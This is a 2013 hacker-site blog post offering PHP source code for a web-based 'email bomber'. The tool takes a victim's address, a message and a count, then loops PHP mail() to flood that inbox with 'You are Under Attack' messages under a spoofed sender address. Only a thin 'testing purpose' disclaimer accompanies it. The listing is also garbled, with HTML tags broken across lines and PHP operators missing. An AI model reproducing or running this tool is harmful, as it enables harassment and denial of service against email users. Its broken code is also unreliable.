Advertise

Friday 20 September 2013

Simple Web Email Bomber. [PHP Source Code]

This Code was written due to lots of request from members in worldofhacker

This is Only for Testing Purpose, if you try to harm person with this S*** of code than I(KroKite) or World of Hacker will not be Responsible for your Crime. Keep Calm, Stay Safe



Note: Your Host will ban you account for doing so.

PHP Code:
<!DOCTYPE html>
<
html lang=en>
    <
head>
        <
title>My Email Bomber</title>
    </
head>
    <
body>
        <
header align=center>
            <
h1My Email Bomber </h1>
        </
header>
        <
section>
            <
form method="post" action="#">
                <
table border="0">
                    <
tr><td>Your EMail : </td><td><input type=email name=email placeholder="Your Mail id If you want to show victime" /></td></tr>
                    <
tr><td>Email id of Person: </td><td><input type=email name=mail placeholder="Enter Slave Email" /></td></tr>
                    <
tr><td valign=top>Message to Slave : </td><td><textarea name=msg rows=8 cols=30 ></textarea></td></tr>
                    <
tr><td>Noof Time You want to Bombard his Email</td><td><input type=text name=no placeholder=100 /></td></tr>
                    <
tr><td><input type=reset value=Reset All /></td><td><input type=submit name=sub value="Start Bombarding Mail" /></td></tr>
                </
table>
            </
form>
        </
section>
        <
footer align=center>
            <
p>Thank you to <a href="http://worldofhacker.com" target="_blank">World of Hacker</aCopyright &copy; <a href="http://www.worldofhacker.com">KroKite</a></p>
        </
footer>
    </
body>
</
html>

phpif(isset($_POST['sub']) || !empty($_POST['mail']) || !empty($_POST['no'])) {
    
$Slave $_POST['mail'];
    
$no $_POST['no'];
    
$msg $_POST['msg'];
    
$hack "hacker@anonymous.com";
    
$headers 'From:'.(!empty($_POST['email'])) ? $_POST['email']:$hack "\r\n" .
            
'Reply-To:'.(!empty($_POST['email'])) ? $_POST['email']:$hack "\r\n" .
            
'X-Mailer: PHP/' phpversion();
    for(
$i=1;$i<=$no;$i++) {
        
$mail mail($Slave"You are Under Attack"$msg$headers);
    if(
$mail) {
        echo 
"{$i}. Mail Sent
"
;
    } else {
        echo 
"{$i}. Mail was not Sent
"
;
    }
    }
} else {
    echo 
"Please fill all the form Properly";
}
?>

Good Luck.
 
World of Hacker © 2011 Creative Commons License
World of Hacker by KroKite is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.
Based on a work at http://www.worldofhacker.com.
Permissions beyond the scope of this license may be available at https://groups.google.com/forum/#!newtopic/hackerforum.